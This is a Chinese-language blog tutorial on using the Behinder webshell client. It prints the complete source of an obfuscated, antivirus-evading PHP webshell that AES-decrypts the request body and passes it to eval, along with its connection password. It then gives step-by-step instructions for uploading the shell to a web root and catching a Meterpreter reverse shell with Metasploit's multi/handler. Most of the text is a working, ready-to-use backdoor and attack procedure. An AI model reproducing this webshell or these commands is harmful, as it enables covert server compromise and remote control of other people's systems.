冰蝎利用免杀webshell链接,反弹shell(附免杀webshell)

2022-12-01 15:25:43 浏览数 (1)

前言:

冰蝎简单说就是利用动态二进制加密实现新型一句话木马的客户端 , 相对于菜刀和蚁剑他的数据是加密传输的,所以不容易被一些防火墙发现。

环境:

我们这里需要的是java环境,版本的话最好就是安装Java最新的了,Windows也是可以使用的,我这里主要介绍的是Linux上使用,我是基于kali中使用的。

Linux环境下: 注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打 开冰蝎目录输入命令

正文:

首先我们拿免杀的webshell

源码:

代码语言:javascript复制
<?php @error_reporting(0);session_start();$key="97dc284cf580da5e";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$HEm9O=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/s /','','base 64 _ deco de');$HEm9O=$t($HEm9O."");for($i=0;$i<strlen($HEm9O);$i  ) { $new_key = $key[$i 1&15];$HEm9O[$i] = $HEm9O[$i] ^ $new_key;}  }else{ $HEm9O=openssl_decrypt($HEm9O, "AES128", $key);}$arr=explode('|',$HEm9O);$func=$arr[0];$params=$arr[1];class Go6049YI{ public function __invoke($p) {@eval("/*ZZZm5Yg5L4*/".$p."");}}@call_user_func/*ZZZm5Yg5L4*/(new Go6049YI(),$params);?>

直接新建一个php文件复制进去就好了

链接的密码是:tide

我们因为是实验的关系,本地搭建一个网站就好了,Windows的选择phpstudy就好,Linux的百度一下安装下apache即可。

我这里是直接在kali上本地实验,ps:大家可以自行安装一些waf,我懒得安装了。

首先我们启动冰蝎,这里我将它放到了我的工具包中,文章末尾会给大家提供软件。

启动的命令:

代码语言:javascript复制
java -jar Behinder_v3.0_Beta6_linux.jar 

然后会弹出我们的图形界面,这里我们就先停一下,将我们的木马传到/var/www/html这个文件夹中,

然后我们回到图形界面去,

我们选择新增后填入你放入木马的主机地址目录

这里我们可以自定义请求头,然后保存即可,保存完我们双击进去

这里我们看到phpinfo的页面就是链接成功了。

这时候我们就可以进行下一步反弹shell了,(其他功能自行尝试)

我们选择功能栏中得到反弹shell

我们需要设置一下我们监听机的IP和端口

我们到kali中打开msf

启动命令:

代码语言:javascript复制
msf run

然后选择攻击和payload

代码语言:javascript复制
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
Show option 查看需要配置的选项

我们这里设置一个IP就好,就是你监听机的IP

代码语言:javascript复制
set lhost 192.168.0.107

然后run 启动监听就好

我们回到冰蝎图形界面,选择metepreter直接点击给我连就行

可以看到这里直接链接成功。

软件关注公众号:白安全组

发送:冰蝎

即可获得软件

网站:www.wangehacker.cn

0 人点赞